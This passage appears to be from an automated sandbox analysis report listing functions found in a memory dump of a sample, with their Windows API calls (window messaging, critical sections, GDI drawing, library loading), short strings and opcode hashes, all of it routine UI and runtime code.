Opcode Fuzzy Hash: 071aed78198d57394066256a1838762bb92eb58a5cdcf062c7bade491d059d6a
Instruction Fuzzy Hash: C2114F71740318ABDB15AB95EC5DBBE7BA9EB99701F100019FA099B280DFB09C04C661

Uniqueness

Uniqueness Score: -1.00%

Function 0011A845, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00287CD8), ref: 0011A876
RtlInitializeCriticalSection.NTDLL(00000000), ref: 0011A88C
RtlLeaveCriticalSection.NTDLL(00287CD8), ref: 0011A89A
RtlEnterCriticalSection.NTDLL(00000000), ref: 0011A8A7

Part of subcall function 0011A821: RtlInitializeCriticalSection.NTDLL(00287CD8), ref: 0011A839

Strings

@{(, xrefs: 0011A868

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID: @{(
API String ID: 713024617-1990548501
Opcode ID: bd3d32ff233a648b54b22454596c0cebad6b9a433d8e80311e2dc2f85b5ed049
Instruction ID: 56714ada5b42bd1b48f2c40dd404a3eadd462a72b4a607ae0aea8d414db4b572
Opcode Fuzzy Hash: bd3d32ff233a648b54b22454596c0cebad6b9a433d8e80311e2dc2f85b5ed049
Instruction Fuzzy Hash: D2F0967A9022149BCA042B95FC8D7957E6CEFE6322FA51072F902C2152CB70D4C38BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00118CBE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00118CCA
TlsGetValue.KERNEL32(z(,?,?,00000000,?,00118C7A,?,00000004,001192CB,00118752,001192F4,0011B475,00119580,?,001196B4), ref: 00118CDE
RtlLeaveCriticalSection.NTDLL(?), ref: 00118CF8
RtlLeaveCriticalSection.NTDLL(?), ref: 00118D03

Strings

z(, xrefs: 00118CDC

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID: z(
API String ID: 3969253408-72658202
Opcode ID: dc25591e48d7cd9410dc6f2a2b3860f1dcf07d86dad8fb78ba73968f22543c6d
Instruction ID: 3987d173b3193c0e65bc3965d8285595ea6470a88f593602e692fce85da66bc9
Opcode Fuzzy Hash: dc25591e48d7cd9410dc6f2a2b3860f1dcf07d86dad8fb78ba73968f22543c6d
Instruction Fuzzy Hash: 5AF0BB326012109B8F1A5F95F889AAAB7A4FFE5750315C0B8E801AB151CF60FC43C791

Uniqueness

Uniqueness Score: -1.00%

Function 00259F71, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00259F23,?,?,00259EEB,?,?,?), ref: 00259F86
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00259F99
FreeLibrary.KERNEL32(00000000,?,?,00259F23,?,?,00259EEB,?,?,?), ref: 00259FBC

Strings

mscoree.dll, xrefs: 00259F7F
CorExitProcess, xrefs: 00259F91

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f5af4fbec21dbd366cde8df01f77a71d4a0ead265fff18cce0f3bbe17efda9bd
Instruction ID: 1b6cde8753685cfef973d88b3d9a97061256132964dac63a2636e865c240e88e
Opcode Fuzzy Hash: f5af4fbec21dbd366cde8df01f77a71d4a0ead265fff18cce0f3bbe17efda9bd
Instruction Fuzzy Hash: 81F0823061121AFBCB11AF61ED0DB9EBB65EB44756F114050FE00E2560CFB0CF51DA95

Uniqueness

Uniqueness Score: -1.00%

Function 0023C96D, Relevance: 7.7, APIs: 5, Instructions: 221windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 0023CACE
SendMessageW.USER32(?,00000187,?,00000000), ref: 0023CB28
GetParent.USER32(?), ref: 0023CB3D
SendMessageW.USER32(?,00000111,?,?), ref: 0023CB6B
SendMessageW.USER32(?,00000185,00000001,?), ref: 0023CB80

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageSend$Parent
String ID:
API String ID: 1020955656-0
Opcode ID: 4f4c459b56960438f05e1c9a9bca133b520681f15f656d65b94ccf86c3fffa1b
Instruction ID: 687e6f2a071123eecb069494e985eec085a2b8ded6c728e62b2a62e7abf7694b
Opcode Fuzzy Hash: 4f4c459b56960438f05e1c9a9bca133b520681f15f656d65b94ccf86c3fffa1b
Instruction Fuzzy Hash: 6361E7B1610215ABDB14DF69DC86A6AB7A9FF84350F248169FD09EF241DB70DD20CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001528A2, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001528A9
RtlEnterCriticalSection.NTDLL(0028A14C), ref: 001528CE
SelectObject.GDI32(?,00000018), ref: 00152995
RtlLeaveCriticalSection.NTDLL(0028A14C), ref: 001529B6
SelectObject.GDI32(00000000), ref: 001529E8

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: CriticalObjectSectionSelect$EnterH_prolog3Leave
String ID:
API String ID: 3084423813-0
Opcode ID: 65bc4c8860d0deb4b31afe54700075b2892a161157914ac9149f930ab7dacc7d
Instruction ID: 49d6b987e47df9f3d4f9c6e6bb8fa45326dfc1a30df9b1b8a79f504733d510d1
Opcode Fuzzy Hash: 65bc4c8860d0deb4b31afe54700075b2892a161157914ac9149f930ab7dacc7d
Instruction Fuzzy Hash: E761AF32600B11CFDB35DF65D885A66B7E4BF66306F14842DECA68B661EB70E848CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0017E7F4, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,00148277), ref: 0017E823

Part of subcall function 00127E5B: ClientToScreen.USER32(?,?), ref: 00127E6A
Part of subcall function 00127E5B: ClientToScreen.USER32(?,?), ref: 00127E77

PtInRect.USER32(00148277,?,?), ref: 0017E83D
PtInRect.USER32(?,?,?), ref: 0017E8B6

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ClientRect$Screen
String ID:
API String ID: 3187875807-0
Opcode ID: 4103302b4e5013ccdd44b6e769c41aed1df5c8ee9bf732b5d4fe45b367d39917
Instruction ID: 4d200067367d6185a128902ffba92f365a75fd59e2b8f03546233df60eeca87f
Opcode Fuzzy Hash: 4103302b4e5013ccdd44b6e769c41aed1df5c8ee9bf732b5d4fe45b367d39917
Instruction Fuzzy Hash: 01414272A0410AEFCF14DFA4D9449AEB7F9EF0D304F1444A9E909FB244D731AA41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001266DE, Relevance: 7.6, APIs: 5, Instructions: 115librarystringloaderCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32(?,?,00000100), ref: 00126734
lstrcmpW.KERNEL32(?,0011D623,?,00000000), ref: 00126746
SetWindowTextW.USER32(?,0011D623), ref: 00126752
GetProcAddress.KERNEL32(00000000,000D2EBC), ref: 001267B0
FreeLibrary.KERNEL32(00000000), ref: 001267FB

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: TextWindow$AddressFreeLibraryProclstrcmp
String ID:
API String ID: 3860112898-0
Opcode ID: 06a71e2b787002e0f061e4972880f9189491570ea2a518e243aa201a15cc1e45
Instruction ID: 346392dce006c445a8a95b8b79b86de5eff30e18538958c257b4842855fb12b1
Opcode Fuzzy Hash: 06a71e2b787002e0f061e4972880f9189491570ea2a518e243aa201a15cc1e45
Instruction Fuzzy Hash: 6B31D675A00219ABCB10EFA4FC85BAEB7B8EF95710F110069FA05D7341EB749D148BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00134DE9, Relevance: 7.6, APIs: 5, Instructions: 113windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000407,00000000,?), ref: 00134E2B
GetParent.USER32(?), ref: 00134E4F
SendMessageW.USER32(00000000,00000111,?), ref: 00134E7C
GetParent.USER32(?), ref: 00134E9B
GetParent.USER32(?), ref: 00134F0F

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Parent$MessageSend
String ID:
API String ID: 2251359880-0
Opcode ID: 47447330b698927734f8172b356c09d0e590c0cbb65b59ec9eaf9a0775e549d3
Instruction ID: be2d54a45fe7580f17f2ec79c0d85c829f0e0ba84bc9b5aa23869bc7fa2984d4
Opcode Fuzzy Hash: 47447330b698927734f8172b356c09d0e590c0cbb65b59ec9eaf9a0775e549d3
Instruction Fuzzy Hash: C231E331601215FFDF296B64DC48A7ABA68FF09711F044236F688D7461D7B8ECA0CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001211C9, Relevance: 7.6, APIs: 5, Instructions: 111libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D20E8), ref: 001212D4
__Init_thread_footer.LIBCMT ref: 001212E4
GetProcAddress.KERNEL32(000D212C), ref: 00121318
GetProcAddress.KERNEL32(000D2140), ref: 0012132E
__Init_thread_footer.LIBCMT ref: 0012133A

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: AddressInit_thread_footerProc$HandleModule
String ID:
API String ID: 2862038163-0
Opcode ID: e98bb378bd8b28bcf2b700896a7c43504c11b52d4eaef5ef1b89349696c92b1d
Instruction ID: 5642bab4ba5ff652445a9f8c5e13fce710c438ffcf64427c6f87f728cb331f48
Opcode Fuzzy Hash: e98bb378bd8b28bcf2b700896a7c43504c11b52d4eaef5ef1b89349696c92b1d
Instruction Fuzzy Hash: DA31D879522221EBDB18EF68FC09AB9B765EB65720F29412AF501C76E4CF7068D0CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001772EF, Relevance: 7.6, APIs: 5, Instructions: 102windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 0017730D
SendMessageW.USER32(00000000,00000439,00000000,?), ref: 00177352
SendMessageW.USER32(?,00000410,00000000,?), ref: 00177398
ScreenToClient.USER32(00000000,?), ref: 001773C0
SendMessageW.USER32(?,00000407,00000000,?), ref: 001773E8

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageSend$ClientScreenWindow
String ID:
API String ID: 4074774880-0
Opcode ID: ac71cb6998a70258596a92940346289a4c3e2d43caf1ffb487873d265b680c22
Instruction ID: ba3fc2e0090eb7c0e95040730e8310bccc3febf1828465415595b963e32d3a33
Opcode Fuzzy Hash: ac71cb6998a70258596a92940346289a4c3e2d43caf1ffb487873d265b680c22
Instruction Fuzzy Hash: 8E31B676A00218ABDB14DF95DC45AEEBBB9FF49710F10416AFE05A7290DB70AD10DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001230BB, Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 001230CC
GetSubMenu.USER32(?,00000000), ref: 001230E2
GetMenuItemID.USER32(?,00000000), ref: 00123108
IsWindow.USER32(?), ref: 00123163
SendMessageW.USER32(?,0000036E,?,?), ref: 0012319B

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Menu$Item$CountMessageSendWindow
String ID:
API String ID: 3454759385-0
Opcode ID: e38beba9552770871e3d81d2052b9c61e72eb4f243abaab553cf499a3f37ae15
Instruction ID: a3c09f8a6160ae0f987a584c2c4d6826e963a0ee62af77a274ac6f30c2f1b62c
Opcode Fuzzy Hash: e38beba9552770871e3d81d2052b9c61e72eb4f243abaab553cf499a3f37ae15
Instruction Fuzzy Hash: AD310632600225BB9B256F65FC499AFB7ADFF95750B014139F811D3110DB74EE319BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001380D8, Relevance: 7.6, APIs: 5, Instructions: 84keyboardwindowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0013810D
GetKeyState.USER32(00000012), ref: 0013813B
GetKeyState.USER32(00000011), ref: 00138148
SendMessageW.USER32(?,00000157,00000000,00000000), ref: 0013815D
SendMessageW.USER32(?,0000014F,00000001,00000000), ref: 00138172

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageSendState$Parent
String ID:
API String ID: 1284845784-0
Opcode ID: 7047f12bb17e86fdc14786848928a6e90d5c6eb8c8543b6be8b5126d41186925
Instruction ID: 6ceb370c92e92d077a37af0c4b257444a12d20e44bd2bbe6c0a46e326b360f5b
Opcode Fuzzy Hash: 7047f12bb17e86fdc14786848928a6e90d5c6eb8c8543b6be8b5126d41186925
Instruction Fuzzy Hash: 3021F036300301AFEF2D7B74AC98ABAB7AAAB95744F05043DF506960A0DFA0DC429750

Uniqueness

Uniqueness Score: -1.00%

Function 00146BD9, Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00146BE0
CreateRectRgnIndirect.GDI32(?), ref: 00146BFF

Part of subcall function 0012844D: SelectClipRgn.GDI32(?,00000000), ref: 0012846D
Part of subcall function 0012844D: SelectClipRgn.GDI32(?,00000000), ref: 00128483

GetParent.USER32(?), ref: 00146C1F
MapWindowPoints.USER32(?,-00000001,?,00000001), ref: 00146C6D
SendMessageW.USER32(?,00000014,00000000,-00000001), ref: 00146C98

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ClipSelect$CreateH_prolog3IndirectMessageParentPointsRectSendWindow
String ID:
API String ID: 3362736716-0
Opcode ID: 569ce1b4d46c6a30c041d88845a005259861f7277448e321ec7a9bcd2e4783a5
Instruction ID: 4bf4a565ac1c1e7d806420e75f6b7c10b9c91e3c2df480fccb77db3ca54cd9b9
Opcode Fuzzy Hash: 569ce1b4d46c6a30c041d88845a005259861f7277448e321ec7a9bcd2e4783a5
Instruction Fuzzy Hash: A8314B76A0022AAFCF00EFA4D848AEE7BB5FF59300F054115F915AB261CB759E10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001306BE, Relevance: 7.6, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001306DF
GetWindow.USER32(?,00000005), ref: 00130717
GetWindowRect.USER32(?,00000000), ref: 00130743

Part of subcall function 0012840E: ScreenToClient.USER32(?,?), ref: 0012841D
Part of subcall function 0012840E: ScreenToClient.USER32(?,00000000), ref: 0012842A

OffsetRect.USER32(00000000,00000000,?), ref: 0013075B

Part of subcall function 00124C32: SetWindowPos.USER32(?,?,00000015,000000FF,000000FF,?,?,?,?,0011F252,00000000,?,?,000000FF,000000FF,00000015), ref: 00124C5A

GetWindow.USER32(?,00000002), ref: 0013077B

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$ClientRectScreen$OffsetParent
String ID:
API String ID: 622029514-0
Opcode ID: fe99405fc324fa00f90717c193dd76751a24ff0d58f1128c6a91ed4163987c92
Instruction ID: cbbeeb669f4ffea91cf229be58dd164ab8e2fcd71bfb26170d6b8d088386d692
Opcode Fuzzy Hash: fe99405fc324fa00f90717c193dd76751a24ff0d58f1128c6a91ed4163987c92
Instruction Fuzzy Hash: 09219271A0071AAFDF11ABA4EC49BAEB7B8FF08721F100525F544A6291DF74DD108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001220A4, Relevance: 7.6, APIs: 5, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D20E8), ref: 00122145
__Init_thread_footer.LIBCMT ref: 00122151

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

GetProcAddress.KERNEL32(000D2100), ref: 00122185
GetProcAddress.KERNEL32(000D2114), ref: 0012219B
__Init_thread_footer.LIBCMT ref: 001221A7

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: AddressInit_thread_footerProc$Exception@8HandleModuleThrow
String ID:
API String ID: 3795892493-0
Opcode ID: 13fe294f73cc160baafee0a0a761dc75560fb4e3b28a97f06119db0efe5cc14d
Instruction ID: 517244d15a2bd351f8177040d2f2e2dd50a21486b8297e5ae702c46d148fa82c
Opcode Fuzzy Hash: 13fe294f73cc160baafee0a0a761dc75560fb4e3b28a97f06119db0efe5cc14d
Instruction Fuzzy Hash: 82216BB9525220EFEB14AF14FC89AADB7A5FB04714F29011AF901472B1CB7058F0CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00150CC8, Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,00000000), ref: 00150CE6

Part of subcall function 00126685: DeleteObject.GDI32(?), ref: 00126697

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

SelectObject.GDI32(?,00000000), ref: 00150CFB
DeleteObject.GDI32(00000000), ref: 00150D61
DeleteDC.GDI32(00000000), ref: 00150D70
RtlLeaveCriticalSection.NTDLL(0028A14C), ref: 00150D8A

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$Delete$Select$CriticalException@8LeaveSectionThrow
String ID:
API String ID: 2943068176-0
Opcode ID: 401395076d8a001ee16521e6a4901295f6fbaa9b52488404219bf9541d7e9f3a
Instruction ID: 0b7da81fb51d8f3e6d9a04c519e9b1111d8058d112dda51de563468a16d1698b
Opcode Fuzzy Hash: 401395076d8a001ee16521e6a4901295f6fbaa9b52488404219bf9541d7e9f3a
Instruction Fuzzy Hash: 13212674900200DFCF11AFE4EC8859ABBB4FF5A312F104266FD289E166CBB1A845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0011970F, Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00119746
GetParent.USER32(?), ref: 0011975D
GetLastActivePopup.USER32(?), ref: 00119770
IsWindowEnabled.USER32(?), ref: 00119784
EnableWindow.USER32(?,00000000), ref: 00119797

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ParentWindow$ActiveEnableEnabledLastPopup
String ID:
API String ID: 2630416829-0
Opcode ID: caeb948c84baddfd021b3b15da23f3325d1707d63b362d4a50b31dcbfa992eb1
Instruction ID: 75a5fdcb6f4c8df8b092b3fc53edffaff7a1f0eecf015c61c2341e88c962ee2b
Opcode Fuzzy Hash: caeb948c84baddfd021b3b15da23f3325d1707d63b362d4a50b31dcbfa992eb1
Instruction Fuzzy Hash: D21186326253215797292E65ACD8BEA769CAFA6B61F050135ED25D7280EF60CC804EA1

Uniqueness

Uniqueness Score: -1.00%

Function 00134BA7, Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00134BD8
GetCursorPos.USER32(?), ref: 00134BE8
ScreenToClient.USER32(?,?), ref: 00134BF5
PtInRect.USER32(?,?,?), ref: 00134C05
SetCursor.USER32(?), ref: 00134C15

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ClientCursorRect$Screen
String ID:
API String ID: 1023402310-0
Opcode ID: f24431b17636b776f9541514f744b4f8c1bf454cd9d150bd51ade3478eeb798b
Instruction ID: 9c2f9ce63e2fa6cfbb60bdddf68fb60a598f564fefcd01782d29bce00a16267c
Opcode Fuzzy Hash: f24431b17636b776f9541514f744b4f8c1bf454cd9d150bd51ade3478eeb798b
Instruction Fuzzy Hash: AF111871D0120ADFCB11AFA5E9498BFFBF9FF99301B10442AE516A2110DB74AA02DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00126067, Relevance: 7.6, APIs: 5, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D1AAC,?,?,0011B7AA,00102804,00000001,?,000000FF,?,000000FF), ref: 00126079
GetProcAddress.KERNEL32(00000000,000D2CE8), ref: 00126089
RtlEncodePointer.NTDLL(00000000), ref: 00126092
RtlDecodePointer.NTDLL(00289804), ref: 001260A0
CompareStringW.KERNEL32(00000000,?,?,?,?,?,?,?,0011B7AA,00102804,00000001,?,000000FF,?,000000FF), ref: 001260E7

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Pointer$AddressCompareDecodeEncodeHandleModuleProcString
String ID:
API String ID: 866791306-0
Opcode ID: c2a05e2c612c0a24bb877637bbe2fbb4c1483745084b7bfae11e6943102fa314
Instruction ID: 7a6eafc8addaaf6259b9deb450ee6e601987fe29ec0b35e68c025e266c18b18e
Opcode Fuzzy Hash: c2a05e2c612c0a24bb877637bbe2fbb4c1483745084b7bfae11e6943102fa314
Instruction Fuzzy Hash: 7101163650122ABFCF122FA0FC09DAE3F6AEF09751B054511FE05921A0DBB1C870AFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001265B9, Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 001265BD
GetParent.USER32(00000000), ref: 001265DE

Part of subcall function 001268FB: GetClassNameW.USER32(?,?,0000000A), ref: 0012692F

GetParent.USER32(?), ref: 0012660B
GetDesktopWindow.USER32 ref: 00126613
SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 00126627

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Parent$ClassDesktopFocusMessageNameSendWindow
String ID:
API String ID: 3500994180-0
Opcode ID: 7916f09b977f305f16b1ca171686e1f0bbd3e0ad3fea3881effb5b932eff1bd2
Instruction ID: 19b8c1e2127a1dcaa0c8ba3cfc40775b0208cf0ad73ad6133246b40abc871815
Opcode Fuzzy Hash: 7916f09b977f305f16b1ca171686e1f0bbd3e0ad3fea3881effb5b932eff1bd2
Instruction Fuzzy Hash: 7EF0A43110123263D7223B25BC4DF6E76599BCAF51F4A0122F901B72D0DFA4CC5245A9

Uniqueness

Uniqueness Score: -1.00%

Function 00120C7D, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23

SendMessageW.USER32(?,00000433,00000000,?), ref: 00120E56

Strings

${(, xrefs: 00120C93
${(, xrefs: 00120D34
,, xrefs: 00120E3E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: H_prolog3MessageSend
String ID: ${($${($,
API String ID: 936991600-3578809944
Opcode ID: 9f7fd040e8c519053260e945509416ed9bb0a8b4476bf6119fedfb52f89074d7
Instruction ID: 6b0738c5c224762f4d780680bfa50d1458f9cf77b0a6ec40b949c074306ce084
Opcode Fuzzy Hash: 9f7fd040e8c519053260e945509416ed9bb0a8b4476bf6119fedfb52f89074d7
Instruction Fuzzy Hash: 8C71E931701629ABCF19AFB4E891AAD77A5BF48310B050279F8059B692DF30ED618B90

Uniqueness

Uniqueness Score: -1.00%

Function 0014EA0E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0014EA15

Part of subcall function 0012738B: __EH_prolog3.LIBCMT ref: 00127392

Part of subcall function 001284D9: SelectObject.GDI32(?,0017A280), ref: 001284E2

FillRect.USER32(?,00000000,-00000098), ref: 0014EB2A

Strings

(, xrefs: 0014EA90
0, xrefs: 0014EAE9

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: FillH_prolog3H_prolog3_ObjectRectSelect
String ID: 0$(
API String ID: 828880526-994966199
Opcode ID: 6c229316648dc7c226b5392212647678131fa56127a3df04ce8147770149a814
Instruction ID: 9eabd49033f0c01552ef4d366cec8e7351e949beaccb52b099ba0da6e8e96af0
Opcode Fuzzy Hash: 6c229316648dc7c226b5392212647678131fa56127a3df04ce8147770149a814
Instruction Fuzzy Hash: 99510871D10258AFDB14EFA5D885AAEFBB8FF14304F14812EE416AB2A1DB749909CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001319D9, Relevance: 6.5, APIs: 4, Instructions: 472COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001319E0
_memcpy_s.LIBCMT ref: 00131B55
_memcpy_s.LIBCMT ref: 00131BBE

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

PathRemoveFileSpecW.SHLWAPI(?,?,?,00000000), ref: 00131CFB

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: _memcpy_s$Exception@8FileH_prolog3PathRemoveSpecThrow
String ID:
API String ID: 3480982519-0
Opcode ID: 23d01f1d2868f95c3d5e4e9ef7186a83977e3611ea887c36e5211e465d24b3ff
Instruction ID: ca48409a1f09cb9834797a114a03a5c032b1069c27ad3f05444abcf0d80bc1f7
Opcode Fuzzy Hash: 23d01f1d2868f95c3d5e4e9ef7186a83977e3611ea887c36e5211e465d24b3ff
Instruction Fuzzy Hash: 7102FF71E016169FDB19DFA8C851AEEBBB6BF84310F14817DE811AB295DB309941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0013F649, Relevance: 6.2, APIs: 4, Instructions: 184COMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 0013F72D
IsWindow.USER32(?), ref: 0013F782
SetRectEmpty.USER32(?), ref: 0013F7FB
SetRectEmpty.USER32(?), ref: 0013F805

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: EmptyRect$Window
String ID:
API String ID: 1945993337-0
Opcode ID: 62ad50a7b06c220ef8ad00f6e51d3235c7e65b3ad2f5b4631f65ea48f52c1376
Instruction ID: f3703c699d009ef52fffbb659a2b154b23afc718eed640d0737a40714ebb4cbb
Opcode Fuzzy Hash: 62ad50a7b06c220ef8ad00f6e51d3235c7e65b3ad2f5b4631f65ea48f52c1376
